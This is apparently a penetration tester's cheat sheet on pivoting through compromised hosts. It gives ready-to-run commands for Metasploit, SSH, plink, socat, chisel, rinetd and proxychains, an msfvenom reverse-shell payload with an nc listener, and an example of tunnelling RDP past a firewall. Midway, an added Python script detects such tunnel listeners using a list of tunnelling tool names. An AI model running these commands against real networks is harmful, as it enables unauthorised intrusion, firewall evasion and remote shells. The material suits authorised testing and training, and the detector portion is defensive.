PORT FORWARDING “port to port”:
MSF
Most platforms
Forward: get a meterpreter session on one of the dual-homed machines, then:
portfwd add -l 4445 -p 4443 -r 10.1.1.1
Use -R to make it reverse.
SSH
| in Kali
-R 8081:172.24.0.2:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
<KALI 10.1.1.1>:8081<————<REMOTE 172.24.0.2>:80
Now you can access 172.24.0.2:80, which you didn’t have direct access to
-L 8083:127.0.0.1:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
<KALI 127.0.0.1>:8084<————<REMOTE 10.1.1.230>:8083<————:XXXX
Run nc listening on port 8084; if 10.1.1.230:8083 receives a reverse shell, you will get it
| For reverse shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f elf -o shell
Run it on the 2nd remote target to get a shell on Kali
Or, if you didn’t have an SSH session, SSH to your Kali from the target machine. On Kali: service ssh start, and “add a user, give it /bin/false in /etc/passwd”. On the target:
ssh -N -R 12345:192.168.122.228:5986 test@10.1.1.1
(-N: request no remote shell; without it the /bin/false shell exits at once and the session, with its forward, closes)
PLINK
Just like SSH, but on Windows. On Kali: service ssh start, then transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target:
plink.exe 10.1.1.1 -P 22 -C -N -L 0.0.0.0:4445:10.1.1.1:4443 -l KALIUSER -pw PASS
SOCAT
For Linux
Forward your 8083 to 62.41.90.2:443
./socat TCP4-LISTEN:8083,fork TCP4:62.41.90.2:443
CHISEL
Most platforms
Remote static tunnels “port to port”:
On Kali “reverse proxy listener”:
./chisel server -p 8000 -reverse
General command:
./chisel client <YOUR IP>:<YOUR CHISEL SERVER PORT> L/R:[YOUR LOCAL IP]:<TUNNEL LISTENING PORT>:<TUNNEL TARGET>:<TUNNEL PORT>
Remote tunnels “access IP:PORT you couldn’t access before”, on Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Local tunnels “listen on the target for something, and send it to us”, on Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
DYNAMIC “port to any”:
Set up proxychains with socks5 on 127.0.0.1:1080, or set up a socks5 proxy in Firefox.
For nmap use -Pn -sT, or use the TCP scanner in msf.
MSF
Most platforms
Get a meterpreter session on one of the dual-homed machines.
Auto-route to 10.1.1.0 (multi/manage/autoroute).
Start the socks proxy (auxiliary/server/socks4a).
SSH
For Linux
-D 1080
PLINK
Just like SSH, but on Windows. On Target:
plink.exe 10.1.1.1 -P 22 -C -N -D 1080 -l KALIUSER -pw PASS
CHISEL
Most platforms
On Kali:
./chisel server -p 8000 -reverse
On Target:
./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5
On Kali:
./chisel client 127.0.0.1:8001 socks
EXAMPLE
c:> mstsc (the Windows equivalent of rdesktop)
Suppose we have a target (lopez) that we want to connect via mstsc to a server (w2003 67.23.72.109); lopez's firewall only lets packets out on port 80, so to use port 3389 we will need another machine to act as our proxy (kali 208.88.127.99).
Steps
1 On Kali we use rinetd
root@kali: vim /etc/rinetd.conf
#bindaddress bindport connectaddress connectport
208.88.127.99 80 67.23.72.109 3389
root@kali: /etc/init.d/rinetd restart
2 From lopez we connect to our proxy machine with mstsc
3 Profit
rdesktop case
I have a shell on an internal, non-routable Windows box and had it download plink
- We connect with putty (plink) to our Kali (.99) and forward port 3389 on Windows to 3390 on Kali
C:> Plink -l root -pw uberpass 208.88.127.99 -R 3390:127.0.0.1:3389
root@kali: netstat -antl | grep LISTEN <- should show 3390 listening
# open another terminal and leave that one open, it is doing the tunnelling
root@kali: rdesktop 127.0.0.1:3390 <- should show the Windows remote desktop
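The netstat check in the rdesktop case above is the same view a defender has of a pivot host. As an added example (not part of these notes), a Python script that parses constructed `ss -tlnp` output and flags listeners owned by the tunnelling tools used on this page, or an sshd listener on a port it was not configured for (which is what an ssh -R forward looks like from the server side). The PIVOT_TOOLS set and the expected sshd port are assumptions.

```python
import re

# Assumption: process names of the tunnelling tools used in these notes.
# Extend the set for your environment.
PIVOT_TOOLS = {"chisel", "socat", "rinetd", "plink", "ssh"}
# Assumption: sshd is only configured to listen on port 22.
EXPECTED_SSHD_PORTS = {22}
# Matches the process column of `ss -tlnp`: users:(("sshd",pid=812,fd=3))
PROC_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')

def parse_ss_line(line):
    """Return (local_addr, proc_name, pid) for one LISTEN row of `ss -tlnp`, else None."""
    parts = line.split()
    if len(parts) < 5 or parts[0] != "LISTEN":
        return None  # header, blank line, or a non-listening socket
    m = PROC_RE.search(line)
    if not m:
        return None  # no process column (ss run without root)
    return parts[3], m.group(1), int(m.group(2))

def find_tunnel_listeners(ss_output):
    """Return (local_addr, process, pid, reason) for listeners that look like forwards."""
    findings = []
    for line in ss_output.splitlines():
        row = parse_ss_line(line)
        if row is None:
            continue
        local, proc, pid = row
        port = int(local.rsplit(":", 1)[1])  # works for 0.0.0.0:22 and [::]:22
        if proc in PIVOT_TOOLS:
            # an ssh client listening is a -L/-D forward; the others are relay tools
            findings.append((local, proc, pid, "tunnelling tool is listening"))
        elif proc == "sshd" and port not in EXPECTED_SSHD_PORTS:
            # an extra sshd listener is what an ssh -R forward looks like server-side
            findings.append((local, proc, pid, "sshd on unexpected port (remote forward?)"))
    return findings

# Constructed sample `ss -tlnp` output (not captured from a real host)
SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      128    127.0.0.1:3390      0.0.0.0:*         users:(("sshd",pid=4412,fd=9))
LISTEN 0      128    127.0.0.1:1080      0.0.0.0:*         users:(("ssh",pid=4501,fd=5))
LISTEN 0      5      0.0.0.0:8083        0.0.0.0:*         users:(("socat",pid=4610,fd=5))
LISTEN 0      128    127.0.0.1:631       0.0.0.0:*         users:(("cupsd",pid=900,fd=7))
"""

for local, proc, pid, reason in find_tunnel_listeners(SAMPLE):
    print(f"{local:16} {proc:6} pid={pid:<5} {reason}")
```

Run it as root on the host so `ss` fills in the process column; the 3390 sshd listener from the plink case above is exactly the kind of row it reports.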
PROXYCHAINS
root@kali:ssh -D 8080 root@admin.megacorpone.com
root@admin: ifconfig (172.16.40.10)
# first configure proxychains to use the socks proxy on 8080
root@kali: proxychains <tool>
e.g.:
root@kali: proxychains nmap -p 3389 -sT -Pn 172.16.40.18-29 --open
|s-CHAINS| ..... BLABLA
...
(172.168.40.20)
3389 open
root@kali: proxychains rdesktop 172.168.40.20
https://hkashfi.blogspot.com.ar/2008/04/bypassing-firewalls-with-port_23.html